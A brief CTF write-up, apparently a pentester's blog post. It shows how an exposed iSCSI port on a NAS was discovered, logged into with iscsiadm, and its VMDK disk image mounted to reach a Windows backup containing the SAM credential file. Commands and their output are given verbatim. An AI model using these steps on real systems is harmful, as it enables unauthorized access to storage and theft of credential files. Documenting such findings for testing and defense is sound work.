Today I was looking at a CTF challenge that included a NAS. A quick NMAP showed the following:

After going over SSH and FTP it was time to investigate the ISCSI port, something I haven’t had to do before. A quick google turned up the popular Hacking Team breach that I remember reading about (http://pastebin.com/raw/0SNSvyjJ).

After a quick port forward:

root@kali:~# iscsiadm -m discovery -t sendtargets -p 127.0.0.1
192.168.0.3:3260,1 iqn.2016-05.uk.common:storage.lun0

Followed by:

root@kali:~# iscsiadm -m node --targetname=iqn.2016-05.uk.common:storage.lun0 -p 192.168.0.3 --login
Logging in to [iface: default, target: iqn.2016-05.uk.common:storage.lun0, portal: 192.168.0.3,3260] (multiple)
Login to [iface: default, target: iqn.2016-05.uk.common:storage.lun0, portal: 192.168.0.3,3260] successful.


Then the image is just a simple mount away:</p>

root@kali:~# vmfs-fuse -o ro ./test1234.vmdk  /mnt/vmimage/

After finding such as easy way to gather more information off a network (in this case a Windows OS backup including SAM file), I will definitely be keep looking out for ISCSI devices on future tests.